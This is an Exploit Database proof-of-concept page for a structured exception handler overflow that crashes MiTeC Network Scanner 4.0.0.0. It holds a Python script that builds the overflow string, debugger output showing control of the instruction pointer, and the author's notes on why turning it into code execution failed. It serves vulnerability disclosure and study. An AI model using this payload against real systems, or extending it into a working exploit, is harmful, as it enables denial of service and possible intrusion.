Network Scanner 4.0.0.0 – Crash (SEH) (PoC)

• Exploit Database
• 13 阅读

• 作者： INSECT.B
  日期： 2016-02-15
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39447/

• #-*- coding: utf-8 -*-
  #
  # Exploit Title: Network Scanner Version 4.0.0.0SEH Crash POC
  # POC Dork: N/A
  # Date: 2016-02-15
  # Author: INSECT.B
  # Twitter : @INSECT.B
  # Facebook : https://www.facebook.com/B.INSECT00
  # Blog : http://binsect00.tistory.com
  # Vendor Homepage: http://www.mitec.cz/
  # Software Link: http://www.mitec.cz/Downloads/NetScan.zip
  # Version: 4.0.0.0
  # Tested on: Windows7 Professional SP1 En x86 
  # CVE : N/A
   
  '''
  [+] Type : SEH
  [-] Insert the string that compile this file in [TOOLS] Tab 'Detect IP from Host name...' field
  [-] string : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAÌÌÌÌBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
  [-] crash info
  (2d0.878): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=00000000 ebx=00000000 ecx=42424242 edx=772571cd esi=00000000 edi=00000000
  eip=42424242 esp=0012edd8 ebp=0012edf8 iopl=0 nv up ei pl zr na pe nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00210246
  42424242 ?????
  
  0:000> !exchain
  0012edec: ntdll!ExecuteHandler2+3a (772571cd)
  0012f534: 42424242
  Invalid exception stack at cccccccc
  
  0:000> d 12f534
  0012f534cc cc cc cc 42 42 42 42-43 43 43 43 43 43 43 43....BBBBCCCCCCCC
  0012f54443 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0012f55443 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0012f56443 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0012f57443 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0012f58443 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0012f59443 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0012f5a443 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0:000> d
  0012f5b443 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0012f5c443 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0012f5d443 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43CCCCCCCCCCCCCCCC
  0012f5e443 43 43 00 95 b4 31 74-84 f6 12 00 00 00 00 00CCC...1t........
  0012f5f40a 80 00 00 ea 01 24 00-00 00 00 00 00 00 00 00......$.........
  0012f604ab 00 0a e7 34 f6 12 00-e7 c4 06 77 ea 01 24 00....4......w..$.
  0012f61415 02 00 00 00 00 00 00-00 00 00 00 15 02 00 00................
  0012f624cd ab ba dc 00 00 00 00-84 f6 12 00 15 02 00 00................
  
  
  '''
  
  import struct
  
  junk1 = "A" * 76
  nSEH = "\xcc\xcc\xcc\xcc"
  SEH = "BBBB"
  shell = "C" * 300
  
  payload = junk1 + nSEH + SEH + shell
  with open("netEx.txt","wb") as f :
  	f.write(payload)
  print payload
  
  """
  Exploit problem
  
  1. Input string(value) was replaced '0x3f' in the memory. then shellcode should be encoded to alpha_mixed.
   Buffer size was 171 bytes. but, encoded shellcode size was over 600 bytes.
  
  2. Null byte cannot be inserted into Input field. so we can't use SEH pointer in a range of NetScanner.exe address (0x00400000~0x008c3000)
  
  3. payload was consisted of'junk - shellcode - nSEH ptr - SEH ptr'. but this step was fail. because junk buffer size was 76 bytes.
   Can't insert shellcode
  
  """